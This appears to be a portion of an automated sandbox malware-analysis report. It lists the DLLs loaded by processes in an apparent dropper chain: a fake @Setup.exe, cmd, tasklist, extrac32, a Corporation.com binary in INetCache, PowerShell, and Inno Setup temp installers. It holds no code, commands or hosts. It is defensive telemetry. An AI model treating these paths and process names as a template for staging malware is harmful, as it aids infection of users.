      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: mpr.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: version.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: winhttp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: wtsapi32.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: winsta.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: textinputframework.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: coreuicomponents.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: coremessaging.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: ntmarta.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: coremessaging.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: shfolder.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: rstrtmgr.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: ncrypt.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: ntasn1.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: wldp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: propsys.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: profapi.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: edputil.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: urlmon.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: iertutil.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: srvcli.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: netutils.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: windows.staterepositoryps.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: sspicli.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: appresolver.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: bcp47langs.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: slc.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: userenv.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: sppc.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: onecorecommonproxystub.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeSection loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeSection loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: mpr.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: version.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: winhttp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: wtsapi32.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: winsta.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: textinputframework.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: coreuicomponents.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: coremessaging.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: ntmarta.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: shfolder.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: rstrtmgr.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: ncrypt.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: ntasn1.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: textshaping.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: wldp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: sspicli.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: dwmapi.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: sfc.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: sfc_os.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: explorerframe.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: propsys.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: dlnashext.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: wpdshext.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: profapi.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: edputil.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: urlmon.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: iertutil.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: srvcli.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: netutils.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: windows.staterepositoryps.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: appresolver.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: bcp47langs.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: slc.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: userenv.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: sppc.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: onecorecommonproxystub.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
